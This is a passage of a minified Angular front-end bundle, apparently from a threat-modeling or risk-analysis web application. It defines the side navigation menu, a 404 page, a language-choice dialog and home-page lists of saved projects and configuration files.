"),m(69,"button",7),he("click",function(){return i.OnClick("/reporting")})("mouseenter",function(){return i.OnMouseEnter("/reporting")})("mouseleave",function(){return i.OnMouseLeave()}),oe(70,"translate"),s(71,"\n      "),m(72,"button",2),s(73,"\n        "),m(74,"mat-icon"),s(75,"receipt_long"),u(),s(76," \n      "),u(),s(77,"\n    "),u(),s(78,"\n  "),u(),s(79,"\n  "),m(80,"div"),s(81,"\n    "),m(82,"button",8),he("click",function(){return i.OnClick("/configuration")})("mouseenter",function(){return i.OnMouseEnter("/configuration")})("mouseleave",function(){return i.OnMouseLeave()}),oe(83,"translate"),s(84,"\n      "),m(85,"button",2),s(86,"\n        "),m(87,"mat-icon"),s(88,"settings"),u(),s(89," \n      "),u(),s(90,"\n    "),u(),s(91,"\n  "),u(),s(92,"\n\n  "),m(93,"div",9),s(94,"\n    "),m(95,"div",10),he("mouseenter",function(){return i.OnMouseEnter("/settings")})("mouseleave",function(){return i.OnMouseLeave()}),oe(96,"translate"),s(97,"\n      "),m(98,"button",11),s(99,"\n        "),m(100,"mat-icon",12),s(101,"account_circle"),u(),s(102,"\n      "),u(),s(103,"\n      "),m(104,"mat-menu",13,14),s(106,"\n        "),m(107,"button",15),s(108,"\n          "),m(109,"mat-icon"),s(110,"login"),u(),s(111,"\n          "),m(112,"span"),s(113),oe(114,"translate"),u(),s(115,"\n        "),u(),s(116,"\n        "),m(117,"button",16),he("click",function(){return i.dataService.LogOut()}),s(118,"\n          "),m(119,"mat-icon"),s(120,"logout"),u(),s(121,"\n          "),m(122,"span"),s(123),oe(124,"translate"),u(),s(125,"\n        "),u(),s(126,"\n        "),m(127,"button",17),he("click",function(){return i.Clear()}),s(128,"\n          "),m(129,"mat-icon"),s(130,"clear"),u(),s(131,"\n          "),m(132,"span"),s(133),oe(134,"translate"),u(),s(135,"\n        "),u(),s(136,"\n        "),m(137,"button",17),he("click",function(){return i.ResetLayout()}),s(138,"\n          "),m(139,"mat-icon"),s(140,"grid_view"),u(),s(141,"\n          "),m(142,"span"),s(143),oe(144,"translate"),u(),s(145,"\n        "),u(),s(146,"\n        "),m(147,"button",17),he("click",function(){return i.OpenCookieConsent()}),s(148,"\n          "),m(149,"mat-icon"),s(150,"cookie"),u(),s(151,"\n          "),m(152,"span"),s(153),oe(154,"translate"),u(),s(155,"\n        "),u(),s(156,"\n        "),ne(157,act,7,2,"button",18),s(158,"\n        "),ne(159,nct,9,3,"button",18),s(160,"\n        "),ne(161,oct,9,3,"button",18),s(162,"\n        "),m(163,"button",19),s(164,"\n          "),m(165,"mat-icon"),s(166,"language"),u(),s(167,"\n          "),m(168,"span"),s(169,"Languages"),u(),s(170,"\n        "),u(),s(171,"\n        "),m(172,"button",19),s(173,"\n          "),m(174,"mat-icon"),s(175,"speaker_notes_off"),u(),s(176,"\n          "),m(177,"span"),s(178),oe(179,"translate"),u(),s(180,"\n        "),u(),s(181,"\n        "),m(182,"button",17),he("click",function(){return i.OpenYouTubePlaylist()}),s(183,"\n          "),m(184,"mat-icon"),s(185,"video_library"),u(),s(186,"\n          "),m(187,"span"),s(188),oe(189,"translate"),u(),s(190,"\n        "),u(),s(191,"\n        "),m(192,"button",17),he("click",function(){return i.OpenGlossary()}),s(193,"\n          "),m(194,"mat-icon"),s(195,"menu_book"),u(),s(196,"\n          "),m(197,"span"),s(198),oe(199,"translate"),u(),s(200,"\n        "),u(),s(201,"\n      "),u(),s(202,"\n      "),m(203,"mat-menu",null,20),s(205,"\n        "),m(206,"button",21),s(207,"\n          "),m(208,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.dataService.HasSpellCheck=r})("click",function(r){return r.stopPropagation()}),s(209),oe(210,"translate"),u(),s(211,"\n        "),u(),s(212,"\n        "),m(213,"button",17),he("click",function(){return i.ChangeLanguage("en")}),s(214,"English"),u(),s(215,"\n        "),m(216,"button",17),he("click",function(){return i.ChangeLanguage("de")}),s(217,"Deutsch"),u(),s(218,"\n      "),u(),s(219,"\n      "),m(220,"mat-menu",null,23),s(222,"\n        "),m(223,"button",21),s(224,"\n          "),m(225,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.messagesService.ShowErrors=r})("click",function(r){return r.stopPropagation()}),s(226),oe(227,"translate"),u(),s(228,"\n        "),u(),s(229,"\n        "),m(230,"button",21),s(231,"\n          "),m(232,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.messagesService.ShowWarnings=r})("click",function(r){return r.stopPropagation()}),s(233),oe(234,"translate"),u(),s(235,"\n        "),u(),s(236,"\n        "),m(237,"button",21),s(238,"\n          "),m(239,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.messagesService.ShowSuccesses=r})("click",function(r){return r.stopPropagation()}),s(240),oe(241,"translate"),u(),s(242,"\n        "),u(),s(243,"\n        "),m(244,"button",21),s(245,"\n          "),m(246,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.messagesService.ShowInfos=r})("click",function(r){return r.stopPropagation()}),s(247),oe(248,"translate"),u(),s(249,"\n        "),u(),s(250,"\n        "),m(251,"button",21),s(252,"\n          "),m(253,"mat-slide-toggle",22),he("ngModelChange",function(r){return i.messagesService.ShowUnsavedChanges=r})("click",function(r){return r.stopPropagation()}),s(254),oe(255,"translate"),u(),s(256,"\n        "),u(),s(257,"\n      "),u(),s(258,"\n    "),u(),s(259,"\n  "),u(),s(260,"\n"),it(261,"div"),u()),2&e){const n=Ti(105),r=Ti(204),c=Ti(221);Ct("bg-color-light1",!i.theme.IsDarkMode)("bg-color-dark1",i.theme.IsDarkMode),C(4),Ct("btn-selected-light",i.IsSelected("/home"))("btn-selected-dark",i.IsSelected("/home",!0)),at("matTooltip",re(5,147,"side-nav.home")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/home"))("icon-selected-dark",i.IsHoveredOrSelected("/home",!0)),C(8),Ct("disabled",!i.dataService.HasProject)("btn-selected-light",i.IsSelected("/dashboard"))("btn-selected-dark",i.IsSelected("/dashboard",!0)),at("matTooltip",re(18,149,"side-nav.dashboard")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/dashboard"))("icon-selected-dark",i.IsHoveredOrSelected("/dashboard",!0)),C(8),Ct("disabled",!i.dataService.HasProject)("btn-selected-light",i.IsSelected("/modeling"))("btn-selected-dark",i.IsSelected("/modeling",!0)),at("matTooltip",re(31,151,"side-nav.modeling")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/modeling"))("icon-selected-dark",i.IsHoveredOrSelected("/modeling",!0)),C(8),Ct("disabled",!i.dataService.HasProject)("btn-selected-light",i.IsSelected("/risk"))("btn-selected-dark",i.IsSelected("/risk",!0)),at("matTooltip",re(44,153,"side-nav.risk")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/risk"))("icon-selected-dark",i.IsHoveredOrSelected("/risk",!0)),C(8),Ct("disabled",!i.dataService.HasProject)("btn-selected-light",i.IsSelected("/mitigation"))("btn-selected-dark",i.IsSelected("/mitigation",!0)),at("matTooltip",re(57,155,"side-nav.mitigation")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/mitigation"))("icon-selected-dark",i.IsHoveredOrSelected("/mitigation",!0)),C(8),Ct("disabled",!i.dataService.HasProject)("btn-selected-light",i.IsSelected("/reporting"))("btn-selected-dark",i.IsSelected("/reporting",!0)),at("matTooltip",re(70,157,"side-nav.reporting")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/reporting"))("icon-selected-dark",i.IsHoveredOrSelected("/reporting",!0)),C(8),Ct("disabled",!i.dataService.IsLoggedIn&&!i.dataService.IsGuest)("btn-selected-light",i.IsSelected("/configuration"))("btn-selected-dark",i.IsSelected("/configuration",!0)),at("matTooltip",re(83,159,"side-nav.configuration")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/configuration"))("icon-selected-dark",i.IsHoveredOrSelected("/configuration",!0)),C(8),Ct("btn-selected-light",i.IsSelected("/settings"))("btn-selected-dark",i.IsSelected("/settings",!0)),at("matTooltip",re(96,161,"side-nav.account")),C(3),Ct("btn-light",!i.theme.IsDarkMode)("btn-dark",i.theme.IsDarkMode),V("matMenuTriggerFor",n),C(2),Ct("icon-selected-light",i.IsHoveredOrSelected("/settings"))("icon-selected-dark",i.IsHoveredOrSelected("/settings",!0)),C(13),ke(re(114,163,"side-nav.login")),C(4),V("disabled",!i.dataService.IsLoggedIn),C(6),ke(re(124,165,"side-nav.logout")),C(10),ke(re(134,167,"side-nav.resetDefault")),C(10),ke(re(144,169,"side-nav.resetLayout")),C(10),ke(re(154,171,"side-nav.cookieConsent")),C(4),V("ngIf",i.dataService.IsLoggedIn),C(2),V("ngIf",i.theme.IsDarkMode),C(2),V("ngIf",!i.theme.IsDarkMode),C(2),V("matMenuTriggerFor",r),C(9),V("matMenuTriggerFor",c),C(6),ke(re(179,173,"side-nav.messages")),C(10),ke(re(189,175,"side-nav.YouTubePlaylist")),C(10),ke(re(199,177,"side-nav.Glossary")),C(10),V("ngModel",i.dataService.HasSpellCheck),C(1),ct("\n            ",re(210,179,"side-nav.spellCheck"),"\n          "),C(16),V("ngModel",i.messagesService.ShowErrors),C(1),ct("\n            ",re(227,181,"general.Error"),"\n          "),C(6),V("ngModel",i.messagesService.ShowWarnings),C(1),ct("\n            ",re(234,183,"general.Warning"),"\n          "),C(6),V("ngModel",i.messagesService.ShowSuccesses),C(1),ct("\n            ",re(241,185,"general.Success"),"\n          "),C(6),V("ngModel",i.messagesService.ShowInfos),C(1),ct("\n            ",re(248,187,"general.Info"),"\n          "),C(6),V("ngModel",i.messagesService.ShowUnsavedChanges),C(1),ct("\n            ",re(255,189,"messages.UnsavedChanges"),"\n          ")}},dependencies:[Ri,x1,Ta,Ea,tH,qq,oa,da,Xo,qo,po,Pa,vg,Xi],styles:[".sidenav-icon-button[_ngcontent-%COMP%]{text-transform:uppercase;text-decoration:none;background:transparent;padding:5px;display:inline-block;border:none}.sidenav-icon-button[_ngcontent-%COMP%]   button[_ngcontent-%COMP%]{width:36px!important;height:36px!important;line-height:36px!important}.sidenav-icon-button[_ngcontent-%COMP%]   button[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{width:24px!important;height:24px!important;line-height:24px!important}.sidenav-icon-button[_ngcontent-%COMP%]   button[_ngcontent-%COMP%]   .material-icons[_ngcontent-%COMP%]{font-size:24px!important}.btn-light[_ngcontent-%COMP%]{color:#00000080}.btn-dark[_ngcontent-%COMP%]{color:#ffffff80}.btn-selected-light[_ngcontent-%COMP%]{border-left-color:#000;border-left-style:solid;border-left-width:2px}.btn-selected-dark[_ngcontent-%COMP%]{border-left-color:#fff;border-left-style:solid;border-left-width:2px}.icon-selected-light[_ngcontent-%COMP%]{color:#000}.icon-selected-dark[_ngcontent-%COMP%]{color:#fff}.disabled[_ngcontent-%COMP%]{pointer-events:none}"]}),t})(),rct=(()=>{class t{constructor(e){this.theme=e}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa))},t.\u0275cmp=Wt({type:t,selectors:[["app-page-not-found"]],decls:19,vars:4,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],[2,"width","100%","height","100%"],[2,"text-align","center"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),it(6,"app-side-nav",3),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"h1",4),s(12,"404 - Page not found"),u(),s(13,"\n    "),u(),s(14,"\n  "),u(),s(15,"\n  "),it(16,"app-status-bar"),s(17,"\n"),u(),s(18,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode))},dependencies:[_u,gu,Od,_f,gf],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}"]}),t})(),sct=(()=>{class t{constructor(e,i){this.translateService=e,this.locStorage=i}ngOnInit(){}ChangeLanguage(e){this.translateService.use(e),this.locStorage.Set(si.LANGUAGE,e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Sn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-language-dialog"]],decls:14,vars:0,consts:[["mat-dialog-title",""],["align","center"],["mat-button","","mat-dialog-close","","cdkFocusInitial","",3,"click"],["mat-button","","mat-dialog-close","",3,"click"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1,"Hi \u{1f44b}\u{1f3fc}"),u(),s(2,"\n"),m(3,"mat-dialog-content"),s(4,"\n  Choose your language \u{1f310}\n"),u(),s(5,"\n"),m(6,"mat-dialog-actions",1),s(7,"\n  "),m(8,"button",2),he("click",function(){return i.ChangeLanguage("en")}),s(9,"Welcome!"),u(),s(10,"\n  "),m(11,"button",3),he("click",function(){return i.ChangeLanguage("de")}),s(12,"Willkommen!"),u(),s(13,"\n"),u())},dependencies:[da,vm,Am,Tm,Em]}),t})();function cct(t,a){if(1&t){const e=Ye();m(0,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.ExchangeConfig(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.name)}}function lct(t,a){if(1&t&&(m(0,"div",45),s(1),oe(2,"translate"),it(3,"br"),s(4,"\n              "),u()),2&t){const e=B(2);C(1),za("\n                ",re(2,2,"pages.home.CurrentProject"),": ",e.dataService.SelectedFile.name,"\n                ")}}function dct(t,a){if(1&t){const e=Ye();m(0,"button",46),he("click",function(){return be(e),Me(B(2).dataService.OnNewProject())}),s(1,"\n                "),m(2,"mat-icon",47),s(3,"add_circle"),u(),s(4),oe(5,"translate"),u()}2&t&&(C(4),ct("\n                ",re(5,1,"pages.home.createProject"),"\n              "))}function mct(t,a){1&t&&(m(0,"button",48),s(1,"\n                "),m(2,"mat-icon",47),s(3,"add_circle"),u(),s(4),oe(5,"translate"),u()),2&t&&(B(),V("matMenuTriggerFor",Ti(131)),C(4),ct("\n                ",re(5,2,"pages.home.createProject"),"\n              "))}function uct(t,a){if(1&t){const e=Ye();m(0,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OnNewProject(r))}),s(1,"\n                  "),m(2,"mat-icon"),s(3),u(),s(4,"\n                  "),m(5,"span"),s(6),u(),s(7,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(2);C(3),ke(i.GetFileIcon(e)),C(3),ke(e.name)}}function hct(t,a){1&t&&(m(0,"mat-icon",55),oe(1,"translate"),s(2,"edit_off"),u()),2&t&&at("matTooltip",re(1,1,"pages.home.notWritable"))}function fct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",49),s(3,"\n                  "),m(4,"mat-icon",50),oe(5,"translate"),s(6,"cloud_queue"),u(),s(7,"\n                  "),m(8,"button",42),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n                  "),m(11,"span",51),s(12),u(),s(13," \n                  "),ne(14,hct,3,3,"mat-icon",52),s(15,"\n                  "),m(16,"button",53),oe(17,"translate"),s(18,"\n                    "),m(19,"mat-icon"),s(20,"more_vert"),u(),s(21,"\n                  "),u(),s(22,"\n                  "),m(23,"mat-menu",null,54),s(25,"\n                    "),m(26,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OpenRepo(r))}),s(27,"\n                      "),m(28,"mat-icon"),s(29,"open_in_new"),u(),s(30,"\n                      "),m(31,"span"),s(32),oe(33,"translate"),u(),s(34,"\n                    "),u(),s(35,"\n                    "),m(36,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.DeleteFile(r))}),s(37,"\n                      "),m(38,"mat-icon"),s(39,"delete"),u(),s(40,"\n                      "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n                    "),u(),s(45,"\n                  "),u(),s(46,"\n                "),u(),s(47,"\n              "),Mt()}if(2&t){const e=a.$implicit,i=Ti(24),n=B(2);C(4),at("matTooltip",re(5,9,"pages.home.storedOnline")),C(5),ke(e.name),C(2),at("matTooltip",n.GetRepoName(e)),C(1),ct("in ",n.CutName(n.GetRepoName(e)),""),C(2),V("ngIf",n.IsProtected(e)),C(2),at("matTooltip",re(17,11,"general.More")),V("matMenuTriggerFor",i),C(16),ke(re(33,13,"general.openInNew")),C(10),ke(re(43,15,"general.Delete"))}}function pct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",56),he("page",function(n){return be(e),Me(B(2).pageGHProjectIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=B(2);V("length",e.dataService.AvailableGHProjects.length)("pageSize",e.pageProjectSize)("hidePageSize",!0)}}function _ct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",49),s(3,"\n                  "),m(4,"mat-icon",50),oe(5,"translate"),s(6,"file_present"),u(),s(7,"\n                  "),m(8,"button",42),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n                  "),m(11,"span",51),s(12),u(),s(13,"\n                  "),m(14,"button",53),oe(15,"translate"),s(16,"\n                    "),m(17,"mat-icon"),s(18,"more_vert"),u(),s(19,"\n                  "),u(),s(20,"\n                  "),m(21,"mat-menu",null,57),s(23,"\n                    "),m(24,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.RemoveFSFile(r))}),s(25,"\n                      "),m(26,"mat-icon"),s(27,"remove"),u(),s(28,"\n                      "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n                    "),u(),s(33,"\n                    "),m(34,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.DeleteFile(r))}),s(35,"\n                      "),m(36,"mat-icon"),s(37,"delete"),u(),s(38,"\n                      "),m(39,"span"),s(40),oe(41,"translate"),u(),s(42,"\n                    "),u(),s(43,"\n                  "),u(),s(44,"\n                "),u(),s(45,"\n              "),Mt()}if(2&t){const e=a.$implicit,i=Ti(22),n=B(2);C(4),at("matTooltip",re(5,8,"pages.home.storedOffline")),C(5),ke(n.dataService.GetFileName(e.path)),C(2),at("matTooltip",n.dataService.GetFilePath(e.path)),C(1),ct("in ",n.CutName(n.dataService.GetFilePath(e.path)),""),C(2),at("matTooltip",re(15,10,"general.More")),V("matMenuTriggerFor",i),C(16),ke(re(31,12,"general.Remove")),C(10),ke(re(41,14,"general.Delete"))}}function gct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",56),he("page",function(n){return be(e),Me(B(2).pageFSProjectIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=B(2);V("length",e.dataService.AvailableFSProjects.length)("pageSize",e.pageProjectSize)("hidePageSize",!0)}}function Cct(t,a){1&t&&(m(0,"mat-icon",55),oe(1,"translate"),s(2,"edit_off"),u()),2&t&&at("matTooltip",re(1,1,"pages.home.notWritable"))}function yct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",58),s(3,"\n                  "),m(4,"mat-icon",50),oe(5,"translate"),s(6,"cloud_queue"),u(),s(7,"\n                  "),m(8,"button",42),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n                  "),m(11,"span",59),s(12),u(),s(13,"\n                  "),ne(14,Cct,3,3,"mat-icon",52),s(15,"\n                  "),m(16,"button",53),oe(17,"translate"),s(18,"\n                    "),m(19,"mat-icon"),s(20,"more_vert"),u(),s(21,"\n                  "),u(),s(22,"\n                  "),m(23,"mat-menu",null,60),s(25,"\n                    "),m(26,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OpenRepo(r))}),s(27,"\n                      "),m(28,"mat-icon"),s(29,"open_in_new"),u(),s(30,"\n                      "),m(31,"span"),s(32),oe(33,"translate"),u(),s(34,"\n                    "),u(),s(35,"\n                    "),m(36,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.DeleteFile(r))}),s(37,"\n                      "),m(38,"mat-icon"),s(39,"delete"),u(),s(40,"\n                      "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n                    "),u(),s(45,"\n                  "),u(),s(46,"\n                "),u(),s(47,"\n              "),Mt()}if(2&t){const e=a.$implicit,i=Ti(24),n=B(2);C(4),at("matTooltip",re(5,8,"pages.home.storedOnline")),C(5),ke(e.name),C(3),ct("in ",n.GetRepoName(e),""),C(2),V("ngIf",n.IsProtected(e)),C(2),at("matTooltip",re(17,10,"general.More")),V("matMenuTriggerFor",i),C(16),ke(re(33,12,"general.openInNew")),C(10),ke(re(43,14,"general.Delete"))}}function bct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",56),he("page",function(n){return be(e),Me(B(2).pageGHConfigIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=B(2);V("length",e.dataService.AvailableGHConfigs.length)("pageSize",e.pageConfigSize)("hidePageSize",!0)}}function Mct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",58),s(3,"\n                  "),m(4,"mat-icon",50),oe(5,"translate"),s(6,"file_present"),u(),s(7,"\n                  "),m(8,"button",42),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n                  "),m(11,"span",51),s(12),u(),s(13,"\n                  "),m(14,"button",53),oe(15,"translate"),s(16,"\n                    "),m(17,"mat-icon"),s(18,"more_vert"),u(),s(19,"\n                  "),u(),s(20,"\n                  "),m(21,"mat-menu",null,61),s(23,"\n                    "),m(24,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.RemoveFSFile(r))}),s(25,"\n                      "),m(26,"mat-icon"),s(27,"remove"),u(),s(28,"\n                      "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n                    "),u(),s(33,"\n                    "),m(34,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).dataService.DeleteFile(r))}),s(35,"\n                      "),m(36,"mat-icon"),s(37,"delete"),u(),s(38,"\n                      "),m(39,"span"),s(40),oe(41,"translate"),u(),s(42,"\n                    "),u(),s(43,"\n                  "),u(),s(44,"\n                "),u(),s(45,"\n              "),Mt()}if(2&t){const e=a.$implicit,i=Ti(22),n=B(2);C(4),at("matTooltip",re(5,8,"pages.home.storedOffline")),C(5),ke(n.dataService.GetFileName(e.path)),C(2),at("matTooltip",n.dataService.GetFilePath(e.path)),C(1),ct("in ",n.CutName(n.dataService.GetFilePath(e.path)),""),C(2),at("matTooltip",re(15,10,"general.More")),V("matMenuTriggerFor",i),C(16),ke(re(31,12,"general.Remove")),C(10),ke(re(41,14,"general.Delete"))}}function vct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",56),he("page",function(n){return be(e),Me(B(2).pageFSConfigIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=B(2);V("length",e.dataService.AvailableFSConfigs.length)("pageSize",e.pageConfigSize)("hidePageSize",!0)}}function Act(t,a){1&t&&(bt(0),s(1,"\n                  "),it(2,"br"),s(3,"\n                  "),m(4,"mat-icon",62),s(5,"install_desktop"),u(),s(6,"\n                  "),m(7,"a",63),s(8),oe(9,"translate"),u(),s(10,"\n                "),Mt()),2&t&&(C(8),ke(re(9,1,"pages.home.downloadDesktop")))}function Tct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"h2"),s(3),oe(4,"translate"),m(5,"button",18),s(6,"\n                  "),m(7,"mat-icon"),s(8,"more_vert"),u(),s(9,"\n                "),u(),s(10,"\n                "),m(11,"mat-menu",null,19),s(13,"\n                  "),m(14,"button",20),he("click",function(){return be(e),Me(B().dataService.OnSave())}),s(15,"\n                    "),m(16,"mat-icon"),s(17,"save"),u(),s(18,"\n                    "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n                  "),u(),s(23,"\n                  "),m(24,"button",21),he("click",function(){return be(e),Me(B().dataService.OnSave(!1,!0))}),oe(25,"translate"),s(26,"\n                    "),m(27,"mat-icon"),s(28,"file_download"),u(),s(29,"\n                    "),m(30,"span"),s(31),oe(32,"translate"),u(),s(33,"\n                  "),u(),s(34,"\n                  "),m(35,"button",22),he("click",function(){return be(e),Me(B().dataService.OnSave(!1,!0,!0))}),oe(36,"translate"),s(37,"\n                    "),m(38,"mat-icon"),s(39,"file_download"),u(),s(40,"\n                    "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n                  "),u(),s(45,"\n                  "),m(46,"button",21),he("click",function(){return be(e),Me(B().dataService.OnSave(!0,!1,!0))}),oe(47,"translate"),s(48,"\n                    "),m(49,"mat-icon"),s(50,"output"),u(),s(51,"\n                    "),m(52,"span"),s(53),oe(54,"translate"),u(),s(55,"\n                  "),u(),s(56,"\n                  "),m(57,"button",23),oe(58,"translate"),s(59,"\n                    "),m(60,"mat-icon"),s(61,"wifi_protected_setup"),u(),s(62,"\n                    "),m(63,"span"),s(64),oe(65,"translate"),u(),s(66,"\n                  "),u(),s(67,"\n                  "),m(68,"mat-menu",null,24),s(70,"\n                    "),m(71,"button",25),s(72,"\n                      "),m(73,"mat-icon"),s(74,"file_upload"),u(),s(75),oe(76,"translate"),u(),s(77,"\n                    "),m(78,"button",26),he("click",function(){return be(e),Me(B().dataService.ExchangeConfigWithDefault())}),s(79),oe(80,"translate"),u(),s(81,"\n                    "),ne(82,cct,2,1,"button",27),s(83,"\n                  "),u(),s(84,"\n                  "),m(85,"button",21),he("click",function(){return be(e),Me(B().dataService.OnTransferProjectDetails())}),oe(86,"translate"),s(87,"\n                    "),m(88,"mat-icon"),s(89,"exit_to_app"),u(),s(90,"\n                    "),m(91,"span"),s(92),oe(93,"translate"),u(),s(94,"\n                  "),u(),s(95,"\n                  "),m(96,"button",20),he("click",function(){return be(e),Me(B().dataService.OnCloseFile())}),s(97,"\n                    "),m(98,"mat-icon"),s(99,"close"),u(),s(100,"\n                    "),m(101,"span"),s(102),oe(103,"translate"),u(),s(104,"\n                  "),u(),s(105,"\n                  "),it(106,"mat-divider"),s(107,"\n                  